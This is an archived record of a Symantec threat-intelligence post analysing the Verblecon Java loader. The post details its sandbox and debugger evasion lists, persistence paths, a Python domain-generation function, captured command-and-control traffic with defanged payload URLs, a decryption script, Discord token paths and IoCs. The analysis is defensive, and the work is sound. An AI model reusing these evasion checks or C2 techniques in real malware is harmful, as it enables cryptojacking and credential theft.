{
	"id": "a62dc27e-aa05-423f-b1ae-605161763637",
	"created_at": "2026-04-06T01:30:24.39385Z",
	"updated_at": "2026-04-10T13:11:50.376608Z",
	"deleted_at": null,
	"sha1_hash": "a25d33e26637b851a21cb2a8166bf285544470c5",
	"title": "Verblecon: Sophisticated New Loader Used in Low-level Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 108678,
	"plain_text": "Verblecon: Sophisticated New Loader Used in Low-level Attacks\r\nBy About the Author\r\nArchived: 2026-04-06 01:09:44 UTC\r\nAn unknown attacker is using a complex and powerful new malware loader in relatively unsophisticated and low-reward\r\nattacks, indicating they may not realize the potential capabilities of the malware they are deploying.\r\nThe malware, Trojan.Verblecon, is being used in attacks that appear to have installing cryptocurrency miners on infected\r\nmachines as their end goal. There are some indications the attacker may also be interested in stealing access tokens for chat\r\napp Discord. However, the capabilities of this malware indicate that it could be highly dangerous if leveraged in ransomware\r\nor espionage campaigns.\r\nVerblecon was first spotted by analysts from Symantec, a division of Broadcom Software, in January 2022. This blog will\r\ndetail the capabilities of the malware.\r\nTechnical breakdown\r\nThe malware is loaded as a server-side polymorphic JAR file. The fact that the file is polymorphic means that, due to\r\nencryption and obfuscation, the code of the malware payload looks different each time it is downloaded. Attackers generally\r\npack malware in this way in an effort to evade detection by security software.\r\nThe malware samples analyzed by Symantec were fully obfuscated, in the code flow, strings, and symbols. The samples\r\nthemselves may be based on publicly available code.\r\nOnce started, the malware checks its command-line arguments. 
It requires at least one command-line argument to execute,\r\nwhich could be the infection or campaign ID initially e.g.\r\n\"CSIDL_SYSTEM_DRIVE\\program files\\java\\jre1.8.0_301\\bin\\javaw.exe\" -jar\r\n\"CSIDL_PROFILE\\appdata\\local\\temp\\rpvbh.jar\" masonkhonsari\r\nand\r\n\"CSIDL_SYSTEM_DRIVE\\program files\\java\\jre1.8.0_301\\bin\\javaw.exe\" -jar\r\n\"CSIDL_PROFILE\\appdata\\local\\temp\\rpvbh.jar\" 923ec15ffa4474ca7bf200bfb90e782d\r\nAdditionally, it also attempts to determine if its own process is being debugged by checking for the following Java\r\ncommand-line arguments:\r\n\"-xbootclasspath\"\r\n\"-xdebug\"\r\n\"-agentlib\"\r\n\"-javaagent:\"\r\n\"-xrun:\"\r\n\"-verbose\"\r\n\"-agentpath:\"\r\nNext, it attempts to detect if it is being opened in a virtual or sandbox environment, which would indicate it is likely being\r\nopened on a security researcher’s machine.\r\nFirst, it checks for the following directories:\r\n\"%ProgramFiles(X86)%\\VMware\\VMware Tools\"\r\n\"%ProgramFiles(X86)%\\Oracle\\VirtualBox Guest Additions\"\r\nIt also obtains the machine MAC address and attempts to check for the following prefixes, which may indicate the file is\r\nbeing opened on a virtual machine:\r\n\"00:05:69\"\r\n\"00:0C:29\"\r\n\"00:1C:14\"\r\n\"00:50:56\"\r\n\"08:00:27\"\r\n\"00:16:3E\"\r\n\"00:1C:42\"\r\n\"0A:00:27\"\r\nFollowing those checks, it executes the following command to obtain a list of running processes:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord\r\nPage 1 of 6\n\ntasklist.exe /fo csv /nh\r\nIt then appears to check these processes against a set 
list:\r\n\"vboxservice.exe\"\r\n\"vboxtray.exe\"\r\n\"xenservice.exe\"\r\n\"vmtoolsd.exe\"\r\n\"vmwaretray.exe\"\r\n\"vmwareuser.exe\"\r\n\"vgauthservice.exe\"\r\n\"vmacthlp.exe\"\r\n\"vmsrvc.exe\"\r\n\"vmusrvc.exe\"\r\n\"prl_cc.exe\"\r\n\"prl_tools.exe\"\r\n\"qemu-ga.exe\"\r\n\"vmcomputeagent.exe\"\r\n\"sandboxie\"\r\n\"vdagent\"\r\n\"vdservice\"\r\n\"fiddler\"\r\n\"joeboxserver.exe\"\r\n\"joeboxcontrol.exe\"\r\n\"blnsvr.exe\"\r\nIt then also checks for the following files:\r\n\"%Windows%\\system32\\windanr.exe\"\r\n\"%Windows%\\system32\\drivers\\VBoxMouse.sys\"\r\n\"%Windows%\\system32\\drivers\\VBoxGuest.sys\"\r\n\"%Windows%\\system32\\drivers\\VBoxSF.sys\"\r\n\"%Windows%\\system32\\drivers\\VBoxVideo.sys\"\r\n\"%Windows%\\system32\\vboxdisp.dll\"\r\n\"%Windows%\\system32\\vboxhook.dll\"\r\n\"%Windows%\\system32\\vboxmrxnp.dll\"\r\n\"%Windows%\\system32\\vboxogl.dll\"\r\n\"%Windows%\\system32\\vboxoglarrayspu.dll\"\r\n\"%Windows%\\system32\\vboxoglcrutil.dll\"\r\n\"%Windows%\\system32\\vboxoglerrorspu.dll\"\r\n\"%Windows%\\system32\\vboxoglfeedbackspu.dll\"\r\n\"%Windows%\\system32\\vboxoglpackspu.dll\"\r\n\"%Windows%\\system32\\vboxoglpassthroughspu.dll\"\r\n\"%Windows%\\system32\\vboxservice.exe\"\r\n\"%Windows%\\system32\\vboxtray.exe\"\r\n\"%Windows%\\system32\\VBoxControl.exe\"\r\n\"%Windows%\\system32\\Drivers\\Vmmouse.sys\"\r\n\"%Windows%\\system32\\Drivers\\vm3dgl.dll\"\r\n\"%Windows%\\system32\\Drivers\\vmdum.dll\"\r\n\"%Windows%\\system32\\Drivers\\vm3dver.dll\"\r\n\"%Windows%\\system32\\Drivers\\vmtray.dll\"\r\n\"%Windows%\\system32\\Drivers\\VMToolsHook.dll\"\r\n\"%Windows%\\system32\\Drivers\\vmmousever.dll\"\r\n\"%Windows%\\system32\\Drivers\\vmhgfs.dll\"\r\n\"%Windows%\\system32\\Drivers\\vmGuestLib.dll\"\r\n\"%Windows%\\system32\\Drivers\\VmGuestLibJava.dll\"\r\n\"%Windows%\\system32\\Driversvmhgfs.dll\"\r\n\"[java.lang.System.getProperty(\"user.home\")]\\Desktop\\moutonheart.wav\"\r\nNext, it appears to check the user name against the 
following:\r\njava.lang.System.getProperty(\"user.name\") == \"WDAGUtilityAccount\"\r\njava.lang.System.getProperty(\"user.name\").startsWith(\"hal-\")\r\nThen it executes the following command:\r\nreg query \"HKU\\S-1-5-19\"\r\nIt is unclear how the output is processed, however, there are some strings that could be related to this or other registry\r\nchecks:\r\n\"HARDWARE\\ACPI\\DSDT\\\"\r\n\"HARDWARE\\ACPI\\FADT\\\"\r\n\"HARDWARE\\ACPI\\RSDT\\\"\r\n\"SOFTWARE\\Oracle\\\"\r\n\"SYSTEM\\ControlSet001\\Services\\\"\r\n\"SYSTEM\\ControlSet001\\Services\\\"\r\n\"SOFTWARE\\Microsoft\\Virtual Machine\\Guest\\\"\r\n\"SOFTWARE\\VMware, Inc.\\\"\r\n\"SOFTWARE\\\"\r\n\"VBOX__\"\r\n\"VBOX__\"\r\n\"VirtualBox Guest Additions\"\r\n\"VBoxGuest\"\r\n\"VBoxMouse\"\r\n\"VBoxService\"\r\n\"VBoxSF\"\r\n\"VBoxVideo\"\r\n\"Parameters\"\r\n\"VMware Tools\"\r\n\"Wine\"\r\nIf satisfied with these checks, it may copy itself as one of the following files:\r\n\"%ProgramData%[INFECTION_ID][INFECTION_ID].jar\"\r\n\"%ALL_USERS_HOME%[INFECTION_ID][INFECTION_ID].jar\"\r\n\"%LOCALAPPDATA%[INFECTION_ID][INFECTION_ID].jar\"\r\nAnd then create one of the following files to use as a loadpoint:\r\n\"%HOMEPATH%\\Library\\LaunchAgents[INFECTION_ID].plist\"\r\n\"%Windows%\\System32\\Tasks[INFECTION_ID]\"\r\n[INFECTION_ID] is computed as follows:\r\nhashlib.md5(b\"%PROCESSOR_IDENTIFIER%%COMPUTERNAME%[USER_NAME]\").hexdigest()\r\nThen it periodically attempts to connect to the following URLs:\r\n\"hxxps://gaymers[.]ax/\"\r\n\"hxxp://[DGA_NAME][.]tk/\"\r\n[DGA_NAME] is apparently generated using the following method:\r\nimport datetime\r\nimport hashlib\r\n\r\ndef dga(day):\r\n    seed = bytes(day.strftime(\"%Y-%m-%d\"), \"ascii\") + b\"verble\"\r\n    md5 = hashlib.md5(seed)\r\n    return md5.hexdigest()\r\n\r\nprint(dga(datetime.date.today()))\r\nThe traffic generated by the malware looks 
like this:\r\nPOST / HTTP/1.1\r\nUser-Agent: VerbleConnectTM\r\nContent-Type: application/x-www-form-urlencoded\r\ncharset: utf-8\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nHost: gaymers.ax\r\nAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\nConnection: keep-alive\r\nContent-Length: 2\r\n\r\nk=\r\nThe server response appears as the below. Some of the strings in this response indicate that the attacker may be leveraging\r\nlegitimate Cloudflare infrastructure to host some of their C\u0026C infrastructure.\r\nHTTP/1.1 200 OK\r\nDate: Fri, 28 Jan 2022 21:27:31 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nCF-Cache-Status: DYNAMIC\r\nExpect-CT: max-age=604800, report-uri=\"hxxps://report-uri[.]cloudflare.com/cdn-cgi/beacon/expect-ct\"\r\nReport-To: {\"endpoints\":[{\"url\":\"hxxps:\\/\\/a.nel.cloudflare[.]com\\/report\\/v3?s=IoiU38KEKgi24kr9QHrmWg%2F%2B7pJc7jkKFghTxjGEGnFLDYDVtn0jrsN5FVkZrQAb9XUJlyEAjfQM%2BZ%2FJVPN4wTrU6Otancwny335hs3uyGy6DoE%2B9nl8eKz9mdDr\"\r\nnel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6d4d4e246b68cdab-CDG\r\nalt-svc: h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400\r\n\r\n3c0\r\nJ2dHYN2DE/N7JQj5ZdxyMVjISfLstuKFQjzMhEcxqaTQvAb3hpYZXlGHMn3mSoG3++twgiJEAjadSFco/P7qgd9mZz+4rzTksF23RJ0BsTRzH7Z2tAF0b62gwh+jTVgeupvenZoqw\r\n0\r\nThe server response body above is an encrypted blob that contains a URL signed with an RSA key. 
This blob can be\r\ndecrypted and validated as follows:\r\n#!/usr/bin/python3\r\nimport Crypto.Cipher.AES\r\nimport Crypto.Hash.SHA256\r\nimport Crypto.PublicKey.RSA\r\nimport Crypto.Signature.pkcs1_15\r\nimport Crypto.Util.Padding\r\nimport base64\r\n\r\n# from sample\r\naes_key = b\"cYIoouG6CRk3ds6dZAfRdQOomHfxOFJ6\"\r\naes_iv = b\"FjP2PQfztKZ7vKxL\"\r\nrsa_certificate = \"MIIFazCCA1OgAwIBAgIUQDUa4ddMSiYJ+8dB2v1yF6kfWsQwDQYJKoZIhvcNAQELBQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVy\r\n\r\ndef disect_response(body):\r\n    decoded_body = base64.b64decode(body)\r\n    cipher = Crypto.Cipher.AES.new(aes_key, Crypto.Cipher.AES.MODE_CBC, IV=aes_iv)\r\n    decrypted_body = cipher.decrypt(decoded_body)\r\n    signed_message = Crypto.Util.Padding.unpad(decrypted_body, cipher.block_size)\r\n    message, signature = signed_message.rsplit(b\"@\")\r\n    print(\"message:\", message)\r\n    print(\"signature:\", signature)\r\n    rsa_public_key = Crypto.PublicKey.RSA.import_key(base64.b64decode(rsa_certificate))\r\n    rsa_verifier = Crypto.Signature.pkcs1_15.PKCS115_SigScheme(rsa_public_key)\r\n    message_hash = Crypto.Hash.SHA256.new(message)\r\n    rsa_verifier.verify(message_hash, base64.b64decode(signature))\r\n    print(\"signature verification: PASS\")\r\n\r\ndisect_response(\"J2dHYN2DE/N7JQj5ZdxyMVjISfLstuKFQjzMhEcxqaTQvAb3hpYZXlGHMn3mSoG3++twgiJEAjadSFco/P7qgd9mZz+4rzTksF23RJ0BsTRzH7Z2tAF0b62g\r\nThe malware then starts communicating with the decoded URL by sending details about the infected computer:\r\nPOST /mafia/login.php HTTP/1.1\r\nUser-Agent: VerbleConnectTM\r\nContent-Type: application/x-www-form-urlencoded\r\ncharset: utf-8\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nHost: gaymers.ax\r\nAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\nConnection: keep-alive\r\nContent-Length: 
291\r\n\r\nid=il~aSS_3ZNaXHMGXLExSyzp6xMrxMB7zCw1zFndLA87jjqd0tPsFqY31LF65YGEt\u0026os=5i1E5v8J8fUqwpvNWkN6QQ\u0026pv=6qWqTXHlWudJmSz_fuWcBA\u0026ip=VfseCVZvINz5rC\r\nThe request body contains the following information about the infected machine in encrypted form:\r\n\"id\" is [INFECTION_ID]\r\n\"os\" is OS version, e.g. \"Windows 10\"\r\n\"pv\" is \"Admin\" when running with Administrator privileges\r\n\"ip\" is JAR pathname\r\n\"cn\" is \"[USER_NAME]@[COMPUTERNAME]\"\r\n\"lr\" has value \"00:00:00\"\r\n\"ct\" has value \"0\"\r\n\"bv\" has value \"v1.0.0\"\r\nThe server has been observed to respond as follows:\r\nHTTP/1.1 200 OK\r\nDate: Fri, 28 Jan 2022 21:29:26 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nCF-Cache-Status: DYNAMIC\r\nExpect-CT: max-age=604800, report-uri=\"hxxps://report-uri[.]cloudflare.com/cdn-cgi/beacon/expect-ct\"\r\nReport-To: {\"endpoints\":[{\"url\":\"hxxps:\\/\\/a.nel.cloudflare[.]com\\/report\\/v3?s=JE2u6s575flQq%2BEumTamotRln2IsYdLgqtQHy0tGJwQp9tuxhWThqxtCzsMG6vVgc%2Fa76jGYsP8hb68S3hKu8Q5lm6H2iIYElyVHw4WOcGSLqi%2FLR6AX5RcYlsXd\"}],\"\r\nnel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6d4d50f69c993a8d-CDG\r\nalt-svc: h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400\r\n\r\n98\r\nRc0OiT8tzq68CmJ7bi0SMLtCQQH8bjxlid0OONwvn+x9g2ku8Ocfx+lT+TZXBzLC9/K7hJ/efOYWz9e1HC3KrRkQoh3OTZezXIOhJ6gTRPiLeqDgCGT79FcFqm7SFEDPHl1NpR14d\r\n0\r\nWhere the response body can be decrypted as follows:\r\nnewtask:1:Mw==:YUhSMGNITTZMeTlxYjI1aGRHaGhibWhoY21SM2FXTnJMbTFsTDJoaGNtUjNhV05yTG1waGNuNXpkR0Z5ZEE9PQ==\r\nThe last term above contains the following string:\r\nhxxps://jonathanhardwick[.]me/hardwick.jar~start\r\nSome samples of the malware are seen communicating with the following servers:\r\ngaymers[.]ax\r\n6f3af6ffb074513b51bba688a0b41df7[.]tk\r\nCommunication between the malware and servers is over HTTP or HTTPS and this communication appears to 
culminate\r\nwith victims being directed to connect to the following:\r\nPOST /mafia/login.php HTTP/1.1\r\nUser-Agent: VerbleConnectTM\r\nContent-Type: application/x-www-form-urlencoded\r\ncharset: utf-8\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nHost: gaymers.ax\r\nAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\nConnection: keep-alive\r\nContent-Length: 291\r\n\r\nid=il~aSS_3ZNaXHMGXLExSyzp6xMrxMB7zCw1zFndLA87jjqd0tPsFqY31LF65YGEt\u0026os=5i1E5v8J8fUqwpvNWkN6QQ\u0026pv=6qWqTXHlWudJmSz_fuWcBA\u0026ip=VfseCVZvINz5rC\r\nThe payload is downloaded from the URL observed earlier:\r\nhxxps://jonathanhardwick[.]me/hardwick.jar\r\nThe payload is obfuscated in a similar way to the other samples, and also contains similar techniques to detect the\r\nvirtualization environment, as well as other functionality.\r\nThe core functionality is to download and execute a binary blob from the following URL:\r\nhxxps://jonathanhardwick[.]me/hardwick.bin\r\nThe blob is decrypted along with *.bin artifacts from the same host. The downloaded blob is then cached on the local\r\nfilesystem (in re-encrypted form) and injected into %Windows%\\SysWow64\\dllhost.exe for execution.\r\nThe injection is performed using com.sun.jna and doesn't use usual APIs for injection.\r\nThe final payload (hardwick.bin) contains the following embedded URL pointing to a configuration file for a cryptocurrency\r\nminer:\r\nhxxps://jonathanhardwick[.]me/config[.]txt\r\nThis indicates that the purpose of this activity was to install cryptocurrency mining software on victim machines.\r\nWhat is the goal of this campaign?\r\nThe evidence found on victim networks appears to indicate that the goal of the attacker was to install cryptocurrency mining\r\nsoftware on victim machines. 
This would appear to be a relatively low-reward goal for the attacker given the level of effort\r\nthat would have been required to develop this sophisticated malware.\r\nThere are also indications that the attacker may be stealing Discord tokens and using these to advertise Trojanized\r\nvideogame applications.\r\nWe suspect they were stealing Discord tokens because some of the obfuscated strings refer to pathnames that are apparently\r\nrelated to Discord clients, specifically:\r\n\"AppData\\Roaming\\discordcanary\\Local Storage\\leveldb\"\r\n\"AppData\\Roaming\\discordptb\\Local Storage\\leveldb\"\r\n\"Library\\Application Support\\discord\\Local Storage\\leveldb\"\r\n\"Library\\Application Support\\discordcanary\\Local Storage\\leveldb\"\r\n\"Library\\Application Support\\discordptb\\Local Storage\\leveldb\"\r\n\".config\\discordcanary\\Local Storage\\leveldb\"\r\n\".config\\discordptb\\Local Storage\\leveldb\"\r\nDiscord is a group chatting app that is particularly popular among the gaming community. Advertising Trojanized\r\nvideogame applications via Discord is likely a redistribution channel for Trojan.Verblecon.\r\nCould this be used to distribute ransomware?    \r\nMost of the infections we saw where this malware was used were on non-enterprise machines; we rarely see ransomware\r\ndeployed on non-enterprise machines.\r\nPrevious reports have connected related domains to a single occurrence of ransomware, but the infrastructure may be shared\r\nwith an unrelated actor. 
The similarities between that incident and the activity we observed includes:\r\nThe use of “verble” in the domain name\r\nThe downloading of shellcode for execution\r\nSimilar obfuscation\r\nHowever, we do not have enough evidence to draw a definitive link between both these sets of activity.\r\nPower in the hands of an inexperienced actor?\r\nThe activity we have seen carried out using this sophisticated loader indicates that it is being wielded by an individual who\r\nmay not realize the capabilities of the malware they are using. However, if it fell into the hands of a more sophisticated actor\r\nthe potential is there for this loader to be used for more serious attacks, including potentially ransomware and espionage\r\ncampaigns.\r\nProtection\r\nFile-based\r\nTrojan.Verblecon\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise (IoCs)\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord\r\nPage 5 of 6\n\n32a9415daa7f37a93dd0b347461844673c0f5baf0c15c01ee48b147dadf28299\r\n3688c249774cc9a28d2b9b316921cec842bb087c57f4733cf5866226fbe2aeed\r\n5a4f6332ad08b35c055bb5e6dfddc79d2f7905e63fac7595efbedd0b27f12eb8\r\n007f5898c52c3aa1c3dca6d3a30f28f5f72d9789fbb440ae656d88959f68e53e\r\nf3f4af5f5eae1a28ad5a01b56d71302a265bce17d2c87ce731edf440612818a6\r\nhxxp://verble[.]software/styles.jar\r\nhxxps://jonathanhardwick[.]me/hardwick.jar\r\nhxxps://jonathanhardwick[.]me/hardwick.bin\r\nhxxps://jonathanhardwick[.]me/config.txt\r\nhxxp://test.verble[.]rocks/dorflersaladreviews.jar\r\nhxxp://test.verble[.]rocks/dorflersaladreviews.bin\r\nSource: 
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord"
	],
	"report_names": [
		"verblecon-sophisticated-malware-cryptocurrency-mining-discord"
	],
	"threat_actors": [],
	"ts_created_at": 1775439024,
	"ts_updated_at": 1775826710,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a25d33e26637b851a21cb2a8166bf285544470c5.pdf",
		"text": "https://archive.orkl.eu/a25d33e26637b851a21cb2a8166bf285544470c5.txt",
		"img": "https://archive.orkl.eu/a25d33e26637b851a21cb2a8166bf285544470c5.jpg"
	}
}